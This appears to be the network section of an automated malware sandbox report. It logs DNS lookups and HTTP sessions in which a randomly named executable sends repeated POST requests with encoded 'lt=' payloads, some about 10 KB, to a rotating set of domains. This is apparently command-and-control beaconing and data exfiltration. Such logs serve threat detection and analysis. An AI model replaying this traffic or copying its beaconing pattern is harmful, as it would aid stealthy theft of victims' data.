                        Sep 9, 2024 04:52:23.972143888 CEST | 1.1.1.1 | 192.168.2.4 | 0xc907 | No error (0) | dns.ladipage.com | - | 54.179.173.60 | A (IP address) | IN (0x0001) | false
                        Sep 9, 2024 04:52:23.972143888 CEST | 1.1.1.1 | 192.168.2.4 | 0xc907 | No error (0) | dns.ladipage.com | - | 13.228.81.39 | A (IP address) | IN (0x0001) | false
                        Sep 9, 2024 04:52:23.972143888 CEST | 1.1.1.1 | 192.168.2.4 | 0xc907 | No error (0) | dns.ladipage.com | - | 18.139.62.226 | A (IP address) | IN (0x0001) | false
                        Sep 9, 2024 04:52:37.955061913 CEST | 1.1.1.1 | 192.168.2.4 | 0xb631 | No error (0) | www.kryto.top | - | 162.0.213.94 | A (IP address) | IN (0x0001) | false
                        Sep 9, 2024 04:52:51.379542112 CEST | 1.1.1.1 | 192.168.2.4 | 0xc14e | No error (0) | www.angelenterprise.biz | angelenterprise.biz | - | CNAME (Canonical name) | IN (0x0001) | false
                        Sep 9, 2024 04:52:51.379542112 CEST | 1.1.1.1 | 192.168.2.4 | 0xc14e | No error (0) | angelenterprise.biz | - | 3.33.130.190 | A (IP address) | IN (0x0001) | false
                        Sep 9, 2024 04:52:51.379542112 CEST | 1.1.1.1 | 192.168.2.4 | 0xc14e | No error (0) | angelenterprise.biz | - | 15.197.148.33 | A (IP address) | IN (0x0001) | false
                        Sep 9, 2024 04:53:04.566490889 CEST | 1.1.1.1 | 192.168.2.4 | 0x323f | No error (0) | www.dyme.tech | - | 13.248.169.48 | A (IP address) | IN (0x0001) | false
                        Sep 9, 2024 04:53:04.566490889 CEST | 1.1.1.1 | 192.168.2.4 | 0x323f | No error (0) | www.dyme.tech | - | 76.223.54.146 | A (IP address) | IN (0x0001) | false
                        Sep 9, 2024 04:53:17.725960016 CEST | 1.1.1.1 | 192.168.2.4 | 0x6371 | No error (0) | www.lilibetmed.online | - | 185.134.245.113 | A (IP address) | IN (0x0001) | false
                        Sep 9, 2024 04:53:31.355860949 CEST | 1.1.1.1 | 192.168.2.4 | 0x3109 | No error (0) | www.mbwd.store | - | 103.42.108.46 | A (IP address) | IN (0x0001) | false
                        Sep 9, 2024 04:53:44.925144911 CEST | 1.1.1.1 | 192.168.2.4 | 0xc7a | Name error (3) | www.terrearcenciel.online | none | none | A (IP address) | IN (0x0001) | false
                        Sep 9, 2024 04:53:53.450860023 CEST | 1.1.1.1 | 192.168.2.4 | 0x1f60 | No error (0) | www.fvti.cloud | - | 38.55.112.70 | A (IP address) | IN (0x0001) | false
                        Sep 9, 2024 04:54:07.050709009 CEST | 1.1.1.1 | 192.168.2.4 | 0x191f | Name error (3) | www.theaji.shop | none | none | A (IP address) | IN (0x0001) | false
                        Sep 9, 2024 04:54:15.587093115 CEST | 1.1.1.1 | 192.168.2.4 | 0x86fd | No error (0) | www.sorriragora.online | sorriragora.online | - | CNAME (Canonical name) | IN (0x0001) | false
                        Sep 9, 2024 04:54:15.587093115 CEST | 1.1.1.1 | 192.168.2.4 | 0x86fd | No error (0) | sorriragora.online | - | 162.240.81.18 | A (IP address) | IN (0x0001) | false
                        Sep 9, 2024 04:54:28.832668066 CEST | 1.1.1.1 | 192.168.2.4 | 0x9c2a | No error (0) | www.jyourwd.store | - | 54.183.209.210 | A (IP address) | IN (0x0001) | false
                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        0 | 192.168.2.4 | 49741 | 82.221.128.183 | 80 | 2132 | C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 9, 2024 04:51:32.806587934 CEST | 489 | OUT | GET /ujbu/?lt=MTTknThtRCJj0AT/2nqFymBldeCJp6XfOmsto+GOgM7INhQU0fKKD5oUBTZzolSVFZTYJ8HdpMRBL7zARboLl6MWH88cVp441dEYiiIl3QDYLx1FQH1mC88=&3ry=nj20Xr HTTP/1.1
                        Host: www.nosr.net
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-US,en;q=0.5
                        Connection: close
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Sep 9, 2024 04:51:33.457263947 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                        Date: Mon, 09 Sep 2024 02:51:29 GMT
                        Server: Apache
                        Accept-Ranges: bytes
                        Cache-Control: no-cache, no-store, must-revalidate
                        Pragma: no-cache
                        Expires: 0
                        Connection: close
                        Transfer-Encoding: chunked
                        Content-Type: text/html
                        Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>34041 9Not Found1fca</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CC
                        Sep 9, 2024 04:51:33.457279921 CEST1236INData Raw: 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20
                        Data Ascii: CCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000;
                        Sep 9, 2024 04:51:33.457324982 CEST | 1236 | IN
                        Data Ascii: itional-info-items ul li { width: 100%; } .info-image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all;
                        Sep 9, 2024 04:51:33.457340002 CEST | 1236 | IN
                        Data Ascii: font-size: 18px; } .contact-info { font-size: 18px; } .info-image { float: left; } .info-heading { margin: 62px 0
                        Sep 9, 2024 04:51:33.457487106 CEST | 1236 | IN
                        Data Ascii: <span class="status-code">37404</span> <span class="status-reason">88Not Found</span> </section> <section class="contact-info"> Please forward this error screen to 1f
                        Sep 9, 2024 04:51:33.457524061 CEST | 748 | IN
                        Data Ascii: FQH1mC88=&amp;3ry=nj20Xr (port 28073) </div> </li> <li class="info-server">107</li> </ul> </div> </div>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        1 | 192.168.2.4 | 49743 | 217.160.0.127 | 80 | 2132 | C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 9, 2024 04:51:56.694547892 CEST | 768 | OUT | POST /4c7j/ HTTP/1.1
                        Host: www.complexity.pub
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 199
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.complexity.pub
                        Referer: http://www.complexity.pub/4c7j/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Ascii: lt=spsn588TGAkFnw0A1ShisnvoVnVg82U064U1F5eZFAGuDxxSlClTHZao5lciH9JTIiovdrmdwUy1lGll80q720ZhpMaoiPkP1NHsA9XBKbCvqY/xxF3IQhN7+ZEdsBQ+8+lyAz5qEDJOsHr8JRfcRpPO33hnNRI5DLAwRfxamczqaKQdo/L6s1l6XYuWqiSkMA==
                        Sep 9, 2024 04:51:57.333204031 CEST | 558 | IN | HTTP/1.1 404 Not Found
                        Content-Type: text/html
                        Transfer-Encoding: chunked
                        Connection: close
                        Date: Mon, 09 Sep 2024 02:51:57 GMT
                        Server: Apache
                        Content-Encoding: gzip


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        2 | 192.168.2.4 | 49744 | 217.160.0.127 | 80 | 2132 | C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 9, 2024 04:51:59.241091967 CEST | 788 | OUT | POST /4c7j/ HTTP/1.1
                        Host: www.complexity.pub
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 219
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.complexity.pub
                        Referer: http://www.complexity.pub/4c7j/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Ascii: lt=spsn588TGAkFmQkA319iknvrQnVglmUw64I1F4qJE0quDQBSkGJTGZaozFcjJdIdIikRduOdwU21lG1l8HS63kZjhsamtvkP1NHsA9rrKbqvqsDxyk3PZBN625EdmhQy8+lAA35QEA9OsFz8Hk/fIZPUongsKBJqEqw4RtpphtWPfMBH5Oqt+1BJKfninhvtXNtqg2B7Hgfbud0bUqJSA/M=
                        Sep 9, 2024 04:51:59.892699003 CEST | 558 | IN | HTTP/1.1 404 Not Found
                        Content-Type: text/html
                        Transfer-Encoding: chunked
                        Connection: close
                        Date: Mon, 09 Sep 2024 02:51:59 GMT
                        Server: Apache
                        Content-Encoding: gzip


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        3 | 192.168.2.4 | 49745 | 217.160.0.127 | 80 | 2132 | C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 9, 2024 04:52:01.794002056 CEST | 10870 | OUT | POST /4c7j/ HTTP/1.1
                        Host: www.complexity.pub
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 10299
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.complexity.pub
                        Referer: http://www.complexity.pub/4c7j/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Sep 9, 2024 04:52:02.552328110 CEST | 558 | IN | HTTP/1.1 404 Not Found
                        Content-Type: text/html
                        Transfer-Encoding: chunked
                        Connection: close
                        Date: Mon, 09 Sep 2024 02:52:02 GMT
                        Server: Apache
                        Content-Encoding: gzip


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        4 | 192.168.2.4 | 49746 | 217.160.0.127 | 80 | 2132 | C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 9, 2024 04:52:04.331119061 CEST | 495 | OUT | GET /4c7j/?3ry=nj20Xr&lt=hrEH6McWLCF5pgA15gNtwiWGYg9JkAgLu443cuDXEGm/YRJcjH1mUpiczm8APdsMFHQVN63ktGuGy3xZxkW75lpPuubSjdIy5/XyCdXWUNnJg8HZvEzqXDM= HTTP/1.1
                        Host: www.complexity.pub
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-US,en;q=0.5
                        Connection: close
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Sep 9, 2024 04:52:04.971285105 CEST | 745 | IN | HTTP/1.1 404 Not Found
                        Content-Type: text/html
                        Content-Length: 601
                        Connection: close
                        Date: Mon, 09 Sep 2024 02:52:04 GMT
                        Server: Apache
                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        5 | 192.168.2.4 | 49747 | 85.159.66.93 | 80 | 2132 | C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 9, 2024 04:52:10.115622997 CEST | 789 | OUT | POST /csz1/ HTTP/1.1
                        Host: www.nevsehir-nakliyat.xyz
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 199
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.nevsehir-nakliyat.xyz
                        Referer: http://www.nevsehir-nakliyat.xyz/csz1/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Ascii: lt=M3XIOEl8pWS+OGNU/snwK3MHHtxDnd7Jvzir5VT3W2I1OCYxZeB0gqSHAQff0ofgykuUCwzgB1fkCweELC+ZBPVO+UEWouy+05NHTufDD7Wk+73Pnxs9JE1uMPO0y8E30dTuafnzfJ5sDRZs0IbjOVISoj/sfnSBkTZtv/wD4fy3Ncbzk8pLrjnojefcxnLdOA==
                        Sep 9, 2024 04:52:10.809689045 CEST | 225 | IN | HTTP/1.1 404 Not Found
                        Server: nginx/1.14.1
                        Date: Mon, 09 Sep 2024 02:52:10 GMT
                        Content-Length: 0
                        Connection: close
                        X-Rate-Limit-Limit: 5s
                        X-Rate-Limit-Remaining: 19
                        X-Rate-Limit-Reset: 2024-09-09T02:52:15.7001068Z


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        6 | 192.168.2.4 | 49748 | 85.159.66.93 | 80 | 2132 | C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 9, 2024 04:52:12.673564911 CEST | 809 | OUT | POST /csz1/ HTTP/1.1
                        Host: www.nevsehir-nakliyat.xyz
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 219
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.nevsehir-nakliyat.xyz
                        Referer: http://www.nevsehir-nakliyat.xyz/csz1/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Ascii: lt=M3XIOEl8pWS+OmdU5PPwMXMELNxDyt7Fvzer5UXnWl81JiIxafB0tKSHLwfa6IesykThCy3gB17kCxOELxGYAfVMx0EUmOy+05NHTubpD9+k+KHPmQs+Dk1vNPO028Ez0dTYaa/VfLRsDTBs0ZbkFVIQmD+5XVfXphUwp/0l1diLIaKp1NIc5jDb+ZWo8k2UVHbMEU4ke/r4nGQbaXFeM3M=
                        Sep 9, 2024 04:52:13.357369900 CEST | 225 | IN | HTTP/1.1 404 Not Found
                        Server: nginx/1.14.1
                        Date: Mon, 09 Sep 2024 02:52:13 GMT
                        Content-Length: 0
                        Connection: close
                        X-Rate-Limit-Limit: 5s
                        X-Rate-Limit-Remaining: 18
                        X-Rate-Limit-Reset: 2024-09-09T02:52:15.7001068Z


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        7 | 192.168.2.4 | 49749 | 85.159.66.93 | 80 | 2132 | C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 9, 2024 04:52:15.215871096 CEST | 10891 | OUT | POST /csz1/ HTTP/1.1
                        Host: www.nevsehir-nakliyat.xyz
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 10299
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.nevsehir-nakliyat.xyz
                        Referer: http://www.nevsehir-nakliyat.xyz/csz1/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Sep 9, 2024 04:52:15.900119066 CEST | 225 | IN | HTTP/1.1 404 Not Found
                        Server: nginx/1.14.1
                        Date: Mon, 09 Sep 2024 02:52:15 GMT
                        Content-Length: 0
                        Connection: close
                        X-Rate-Limit-Limit: 5s
                        X-Rate-Limit-Remaining: 19
                        X-Rate-Limit-Reset: 2024-09-09T02:52:20.7881459Z


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        8 | 192.168.2.4 | 49750 | 85.159.66.93 | 80 | 2132 | C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 9, 2024 04:52:17.829900980 CEST | 502 | OUT | GET /csz1/?lt=B1/oNyROsiSyJWt54sjQUnhVOao8yN6EjDCW2TmJGWt8WTZ/bsR6m46aAGz/4MK8zBu+cRD9UFqoGBqEMg6eHtZJx19cpfOg85xNQ5XVPrG77fbRlwYpG0k=&3ry=nj20Xr HTTP/1.1
                        Host: www.nevsehir-nakliyat.xyz
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-US,en;q=0.5
                        Connection: close
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Sep 9, 2024 04:52:18.546174049 CEST | 225 | IN | HTTP/1.1 404 Not Found
                        Server: nginx/1.14.1
                        Date: Mon, 09 Sep 2024 02:52:18 GMT
                        Content-Length: 0
                        Connection: close
                        X-Rate-Limit-Limit: 5s
                        X-Rate-Limit-Remaining: 19
                        X-Rate-Limit-Reset: 2024-09-09T02:52:23.4310316Z


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        9 | 192.168.2.4 | 49751 | 54.179.173.60 | 80 | 2132 | C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 9, 2024 04:52:23.990776062 CEST | 777 | OUT | POST /wg84/ HTTP/1.1
                        Host: www.masteriocp.online
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 199
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.masteriocp.online
                        Referer: http://www.masteriocp.online/wg84/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Ascii: lt=8AsyGU9UOuOI8mfM0SG1k3tk2J6v/pakLVPphUWSLKw0s5KOLxdrdy6yfBx0CeBO3nFPd3HiM5ndjfX7PlAnHNh9LN94F4g0AVv3PZ8xzXfvItRd7Fxpl5lTrupJqNfakP9T5oQ9xmbuPmPVnfLPrh/az1OEFBmuMXPwK2l0FDt4XHrvPNsCfS3FRGZ0gH6/NQ==
                        Sep 9, 2024 04:52:24.881259918 CEST | 368 | IN | HTTP/1.1 301 Moved Permanently
                        Server: openresty
                        Date: Mon, 09 Sep 2024 02:52:24 GMT
                        Content-Type: text/html
                        Content-Length: 166
                        Connection: close
                        Location: https://www.masteriocp.online/wg84/
                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        10 | 192.168.2.4 | 49752 | 54.179.173.60 | 80 | 2132 | C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 9, 2024 04:52:26.538639069 CEST | 797 | OUT | POST /wg84/ HTTP/1.1
                        Host: www.masteriocp.online
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 219
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.masteriocp.online
                        Referer: http://www.masteriocp.online/wg84/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 38 41 73 79 47 55 39 55 4f 75 4f 49 39 47 76 4d 32 7a 47 31 6c 58 74 6e 71 5a 36 76 6d 5a 61 67 4c 56 7a 70 68 56 54 66 4c 38 59 30 73 62 43 4f 4b 77 64 72 61 79 36 79 51 68 78 74 64 75 42 5a 33 6e 4a 70 64 32 37 69 4d 35 44 64 6a 66 6e 37 49 57 6f 6d 47 64 68 37 66 39 39 32 49 59 67 30 41 56 76 33 50 5a 70 71 7a 54 7a 76 49 63 68 64 35 6b 78 6f 76 5a 6c 55 38 65 70 4a 37 39 66 65 6b 50 38 38 35 71 6b 54 78 6a 66 75 50 6a 7a 56 6e 75 4c 4f 34 42 2f 63 75 6c 50 59 4d 78 43 69 56 55 4b 59 56 30 46 73 4d 67 59 66 53 42 36 31 65 38 4e 56 4e 53 54 32 4d 42 51 41 74 45 48 32 57 65 36 48 6f 57 4f 49 47 58 6c 78 4d 66 6d 43 4e 74 75 65 41 75 34 3d
                        Data Ascii: lt=8AsyGU9UOuOI9GvM2zG1lXtnqZ6vmZagLVzphVTfL8Y0sbCOKwdray6yQhxtduBZ3nJpd27iM5Ddjfn7IWomGdh7f992IYg0AVv3PZpqzTzvIchd5kxovZlU8epJ79fekP885qkTxjfuPjzVnuLO4B/culPYMxCiVUKYV0FsMgYfSB61e8NVNST2MBQAtEH2We6HoWOIGXlxMfmCNtueAu4=
                        Sep 9, 2024 04:52:27.486562967 CEST | 368 | IN | HTTP/1.1 301 Moved Permanently
                        Server: openresty
                        Date: Mon, 09 Sep 2024 02:52:27 GMT
                        Content-Type: text/html
                        Content-Length: 166
                        Connection: close
                        Location: https://www.masteriocp.online/wg84/
                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        11 | 192.168.2.4 | 49753 | 54.179.173.60 | 80 | 2132 | C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 9, 2024 04:52:29.091778040 CEST | 10879 | OUT | POST /wg84/ HTTP/1.1
                        Host: www.masteriocp.online
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 10299
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.masteriocp.online
                        Referer: http://www.masteriocp.online/wg84/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 38 41 73 79 47 55 39 55 4f 75 4f 49 39 47 76 4d 32 7a 47 31 6c 58 74 6e 71 5a 36 76 6d 5a 61 67 4c 56 7a 70 68 56 54 66 4c 38 67 30 74 75 57 4f 4c 54 31 72 62 79 36 79 5a 42 78 6f 64 75 41 62 33 6e 52 74 64 32 32 58 4d 37 4c 64 79 4d 66 37 4a 6e 6f 6d 4a 64 68 37 41 74 39 37 46 34 68 70 41 56 2f 7a 50 5a 35 71 7a 54 7a 76 49 65 35 64 77 56 78 6f 70 5a 6c 54 72 75 70 46 71 4e 66 32 6b 50 31 4c 35 70 49 74 78 58 72 75 50 44 44 56 6c 38 54 4f 69 42 2f 65 74 6c 50 51 4d 78 2f 38 56 58 75 36 56 77 4e 57 4d 6e 77 66 66 56 37 68 5a 66 38 50 4f 42 6a 43 52 78 4d 2b 68 55 66 4f 54 2b 79 5a 73 32 2b 76 65 45 70 52 4d 63 72 74 61 4e 47 53 58 59 34 76 75 4b 6e 4c 36 72 69 68 4b 31 50 46 6e 4d 47 4c 6f 6f 43 62 35 64 74 35 68 4e 47 6c 50 4f 67 39 70 50 4e 6e 72 32 47 34 6f 4e 6b 42 46 58 31 6a 4c 78 35 4b 51 4b 63 62 59 64 7a 51 6e 79 66 77 53 35 31 67 56 52 56 47 57 38 4f 31 44 50 33 77 79 50 67 37 4e 76 58 75 31 61 6c 4a 4b 6e 4c 78 32 71 49 48 78 43 4a 57 4b 4e 45 70 79 6e 49 53 2f 43 35 6c 4f 46 55 [TRUNCATED]
                        Data Ascii: lt=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 [TRUNCATED]
                        Sep 9, 2024 04:52:30.018930912 CEST | 368 | IN | HTTP/1.1 301 Moved Permanently
                        Server: openresty
                        Date: Mon, 09 Sep 2024 02:52:29 GMT
                        Content-Type: text/html
                        Content-Length: 166
                        Connection: close
                        Location: https://www.masteriocp.online/wg84/
                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
